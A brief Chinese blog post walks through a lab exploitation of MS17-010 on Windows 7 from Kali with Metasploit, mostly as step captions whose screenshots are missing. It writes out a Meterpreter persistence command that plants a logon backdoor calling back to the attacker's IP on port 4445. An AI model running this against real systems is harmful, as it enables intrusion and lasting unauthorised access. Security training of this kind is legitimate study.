ms17-010漏洞

注:本文章只用于学习和交流使用,请各位读者切勿利用该漏洞做出出格的事情!!!

实验环境:

kali、win7

 

启动metasploit控制台调用ms17-010模块

 

 

设置目标ip

 

测试目标是否存在该漏洞

 

调用exploit模块设置目标ip

 

设置payload和本地ip开始执行

 

 

成功获取shell

 

维持权限
run persistence -U -i -p 4445 -r 本地ip    

ps 查看rscript.exe

 

posted @ 2020-06-30 23:46  f1veseven  阅读(140)  评论(0编辑  收藏  举报